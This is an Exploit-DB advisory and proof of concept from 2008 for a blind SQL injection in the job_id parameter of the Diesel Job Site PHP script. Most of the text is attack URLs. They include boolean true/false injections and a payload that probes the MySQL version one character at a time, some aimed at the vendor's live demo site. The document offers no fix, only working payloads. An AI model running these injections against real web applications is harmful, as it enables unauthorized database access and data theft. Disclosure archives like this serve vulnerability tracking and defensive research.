Diesel Job Site job_id Blind SQL Injection Vulnerability

2008-09-21T00:00:00
ID EDB-ID:6512
Type exploitdb
Reporter Stack
Modified 2008-09-21T00:00:00

Description

Diesel Job Site (job_id) Blind SQL Injection Vulnerability. CVE-2008-6467. Webapps exploit for php platform

                                        
                                            Diesel Job Site Blind Sql Injection P0c
Author : Stack
Home Script :  http://www.dieselscripts.com

Desc :
look the select Job Viewed: in [real id]+and+1=1 (true) the times change each time
but in [real id]+and+1=0 (false) it remains stable
 
go to url exploit or poc 2 or 3 times for see the difference
between (true) and (false)
 
P0c :
http://site.il/jobs/jobseekers/job-info.php?job_id=[real id]+and+1=1
http://site.il/jobs/jobseekers/job-info.php?job_id=[real id]+and+1=0
Exploit :
http://site.il/jobs/jobseekers/job-info.php?job_id=[real id]+and+substring(@@version,1,1)=5
http://site.il/jobs/jobseekers/job-info.php?job_id=[real id]+and+substring(@@version,1,1)=4
Live Demo P0c :
http://www.dieselscripts.com/demo/jobs/jobseekers/job-info.php?job_id=56+and+1=1
http://www.dieselscripts.com/demo/jobs/jobseekers/job-info.php?job_id=56+and+1=0
Live Demo Exploit :
http://www.dieselscripts.com/demo/jobs/jobseekers/job-info.php?job_id=56+and+substring(@@version,1,1)=5
http://www.dieselscripts.com/demo/jobs/jobseekers/job-info.php?job_id=56+and+substring(@@version,1,1)=4

# milw0rm.com [2008-09-21]